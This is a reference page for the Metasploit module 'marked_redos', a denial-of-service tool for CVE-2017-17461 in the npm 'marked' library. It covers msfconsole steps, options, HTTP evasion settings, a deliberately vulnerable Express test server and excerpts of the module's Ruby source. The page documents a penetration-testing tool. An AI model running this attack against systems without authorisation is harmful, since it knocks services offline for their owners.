marked npm module "heading" ReDoS - Metasploit


This page contains detailed information about how to use the auxiliary/dos/http/marked_redos metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: marked npm module "heading" ReDoS
Module: auxiliary/dos/http/marked_redos
Source code: modules/auxiliary/dos/http/marked_redos.rb
Disclosure date: -
Last modification time: 2018-08-16 14:59:32 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2017-17461

This module exploits a Regular Expression Denial of Service vulnerability in the npm module "marked". The vulnerable portion of code that this module targets is in the "heading" regular expression. Web applications that use "marked" for generating html from markdown are vulnerable. Versions up to 0.4.0 are vulnerable.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


msf > use auxiliary/dos/http/marked_redos
msf auxiliary(marked_redos) > show targets
    ... a list of targets ...
msf auxiliary(marked_redos) > set TARGET target-id
msf auxiliary(marked_redos) > show options
    ... show and set options ...
msf auxiliary(marked_redos) > exploit

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Vulnerable Application


This auxiliary module exploits a Regular Expression Denial of Service vulnerability in the npm module marked. The vulnerable regex is in the "heading" processing. Versions before 0.3.19 are vulnerable. Any application that uses a vulnerable version of this module and passes untrusted input to the module will be vulnerable.

How to Install

To install a vulnerable version of marked, run: npm i [email protected]

Verification Steps


  1. Create a new directory for test application.
  2. Copy below example server into test application directory as server.js.
  3. Run npm i express to install express in the test application directory.
  4. To test vulnerable versions of the module, run npm i [email protected] to install a vulnerable version of marked.
  5. To test non-vulnerable versions of the module, run npm i marked to install the latest version of marked.
  6. Once all dependencies are installed, run the server with node server.js.
  7. Open up a new terminal.
  8. Start msfconsole.
  9. use auxiliary/dos/http/marked_redos.
  10. set RHOST [IP].
  11. set HTTP_METHOD get (optional)
  12. set HTTP_PARAMETER foo (required)
  13. set TARGETURI /path/to/vulnerable/route (optional)
  14. run.
  15. In vulnerable installations, Module should have positive output and the test application should accept no further requests.
  16. In non-vulnerable installations, module should have negative output and the test application should accept further requests.

Scenarios


marked npm module version 0.3.19

Expected output for successful exploitation:

[*] Testing Service to make sure it is working.
[*] Test request successful, attempting to send payload
[*] Sending ReDoS request to 192.168.3.24:3000.
[*] No response received from 192.168.3.24:3000, service is most likely unresponsive.
[*] Testing for service unresponsiveness.
[+] Service not responding.
[*] Auxiliary module execution completed

Example Vulnerable Application

// npm i express body-parser
// npm i [email protected] (vulnerable)
// npm i marked (non-vulnerable)

const marked = require('marked');
const express = require('express');
const bodyParser = require('body-parser');

var app = express();
app.use(bodyParser.text({ type: 'text/html' }));

// create application/json parser
const jsonParser = bodyParser.json();

// create application/x-www-form-urlencoded parser
const urlencodedParser = bodyParser.urlencoded({ extended: false });

app.get("/", urlencodedParser, function(req, res) {
  var result = req.query.foo ? marked(req.query.foo) : 'nothing';
  res.end(result);
});

app.post("/cat", urlencodedParser, function(req, res) {
  var result = req.body.bar ? marked(req.body.bar) : 'nothing'
  res.end(result);
});

app.listen(3000, '0.0.0.0', function() { console.log('Application listening on port 3000 on all interfaces!'); });

Go back to menu.

Msfconsole Usage


Here is how the dos/http/marked_redos auxiliary module looks in the msfconsole:

msf6 > use auxiliary/dos/http/marked_redos

msf6 auxiliary(dos/http/marked_redos) > show info

       Name: marked npm module "heading" ReDoS
     Module: auxiliary/dos/http/marked_redos
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Adam Cazzolla, Sonatype Security Research
  Nick Starke, Sonatype Security Research

Check supported:
  No

Basic options:
  Name            Current Setting  Required  Description
  ----            ---------------  --------  -----------
  HTTP_METHOD     GET              yes       The default HTTP Verb to use
  HTTP_PARAMETER                   yes       The vulnerable HTTP parameters
  Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                           yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT           80               yes       The target port (TCP)
  SSL             false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI       /                yes       The URL Path to use
  VHOST                            no        HTTP server virtual host

Description:
  This module exploits a Regular Expression Denial of Service 
  vulnerability in the npm module "marked". The vulnerable portion of 
  code that this module targets is in the "heading" regular 
  expression. Web applications that use "marked" for generating html 
  from markdown are vulnerable. Versions up to 0.4.0 are vulnerable.

References:
  https://blog.sonatype.com/cve-2017-17461-vulnerable-or-not
  https://cwe.mitre.org/data/definitions/400.html

Module Options


This is a complete list of options available in the dos/http/marked_redos auxiliary module:

msf6 auxiliary(dos/http/marked_redos) > show options

Module options (auxiliary/dos/http/marked_redos):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   HTTP_METHOD     GET              yes       The default HTTP Verb to use
   HTTP_PARAMETER                   yes       The vulnerable HTTP parameters
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                           yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT           80               yes       The target port (TCP)
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI       /                yes       The URL Path to use
   VHOST                            no        HTTP server virtual host

Advanced Options


Here is a complete list of advanced options supported by the dos/http/marked_redos auxiliary module:

msf6 auxiliary(dos/http/marked_redos) > show advanced

Module advanced options (auxiliary/dos/http/marked_redos):

   Name                  Current Setting                                     Required  Description
   ----                  ---------------                                     --------  -----------
   DOMAIN                WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS         true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   FingerprintCheck      true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                         no        HTTP connection and receive timeout
   HttpPassword                                                              no        The HTTP password to specify for authentication
   HttpRawHeaders                                                            no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace             false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors       red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly  false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                              no        The HTTP username to specify for authentication
   SSLVersion            Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent             Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE               false                                               no        Enable detailed status messages
   WORKSPACE                                                                 no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the dos/http/marked_redos module can do:

msf6 auxiliary(dos/http/marked_redos) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the dos/http/marked_redos auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(dos/http/marked_redos) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

<PEER> - Could not communicate with service.


Here is a relevant code snippet related to the "<PEER> - Could not communicate with service." error message:

41:	  def run
42:	    if test_service
43:	      trigger_redos
44:	      test_service_unresponsive
45:	    else
46:	      fail_with(Failure::Unreachable, "#{peer} - Could not communicate with service.")
47:	    end
48:	  end
49:	
50:	  def trigger_redos
51:	    begin

ReDoS request unsuccessful. Received status <RES.CODE> from <PEER>.


Here is a relevant code snippet related to the "ReDoS request unsuccessful. Received status <RES.CODE> from <PEER>." error message:

60:	      }
61:	
62:	      res = send_request_cgi(params)
63:	
64:	      if res
65:	        fail_with(Failure::Unknown, "ReDoS request unsuccessful. Received status #{res.code} from #{peer}.")
66:	      end
67:	
68:	      print_status("No response received from #{peer}, service is most likely unresponsive.")
69:	    rescue ::Rex::ConnectionRefused
70:	      print_error("Unable to connect to #{peer}.")

No response received from <PEER>, service is most likely unresponsive.


Here is a relevant code snippet related to the "No response received from <PEER>, service is most likely unresponsive." error message:

63:	
64:	      if res
65:	        fail_with(Failure::Unknown, "ReDoS request unsuccessful. Received status #{res.code} from #{peer}.")
66:	      end
67:	
68:	      print_status("No response received from #{peer}, service is most likely unresponsive.")
69:	    rescue ::Rex::ConnectionRefused
70:	      print_error("Unable to connect to #{peer}.")
71:	    rescue ::Timeout::Error
72:	      print_status("No HTTP response received from #{peer}, this indicates the payload was successful.")
73:	    end

Unable to connect to <PEER>.


Here is a relevant code snippet related to the "Unable to connect to <PEER>." error message:

65:	        fail_with(Failure::Unknown, "ReDoS request unsuccessful. Received status #{res.code} from #{peer}.")
66:	      end
67:	
68:	      print_status("No response received from #{peer}, service is most likely unresponsive.")
69:	    rescue ::Rex::ConnectionRefused
70:	      print_error("Unable to connect to #{peer}.")
71:	    rescue ::Timeout::Error
72:	      print_status("No HTTP response received from #{peer}, this indicates the payload was successful.")
73:	    end
74:	  end
75:	

No HTTP response received from <PEER>, this indicates the payload was successful.


Here is a relevant code snippet related to the "No HTTP response received from <PEER>, this indicates the payload was successful." error message:

67:	
68:	      print_status("No response received from #{peer}, service is most likely unresponsive.")
69:	    rescue ::Rex::ConnectionRefused
70:	      print_error("Unable to connect to #{peer}.")
71:	    rescue ::Timeout::Error
72:	      print_status("No HTTP response received from #{peer}, this indicates the payload was successful.")
73:	    end
74:	  end
75:	
76:	  def test_service_unresponsive
77:	    begin

Service responded with a valid HTTP Response; ReDoS attack failed.


Here is a relevant code snippet related to the "Service responded with a valid HTTP Response; ReDoS attack failed." error message:

83:	      })
84:	
85:	      if res.nil?
86:	        print_good('Service not responding.')
87:	      else
88:	        print_error('Service responded with a valid HTTP Response; ReDoS attack failed.')
89:	      end
90:	    rescue ::Rex::ConnectionRefused
91:	      print_error('An unknown error occurred.')
92:	    rescue ::Timeout::Error
93:	      print_good('HTTP request timed out, most likely the ReDoS attack was successful.')

An unknown error occurred.


Here is a relevant code snippet related to the "An unknown error occurred." error message:

86:	        print_good('Service not responding.')
87:	      else
88:	        print_error('Service responded with a valid HTTP Response; ReDoS attack failed.')
89:	      end
90:	    rescue ::Rex::ConnectionRefused
91:	      print_error('An unknown error occurred.')
92:	    rescue ::Timeout::Error
93:	      print_good('HTTP request timed out, most likely the ReDoS attack was successful.')
94:	    end
95:	  end
96:	

Unable to connect to <PEER>.


Here is a relevant code snippet related to the "Unable to connect to <PEER>." error message:

107:	        print_status("Test request successful, attempting to send payload. Server returned #{res.code}")
108:	        return true
109:	      else
110:	        return false
111:	      end
112:	    rescue ::Rex::ConnectionRefused
113:	      print_error("Unable to connect to #{peer}.")
114:	      return false
115:	    end
116:	  end
117:	end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Adam Cazzolla, Sonatype Security Research
  • Nick Starke, Sonatype Security Research

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.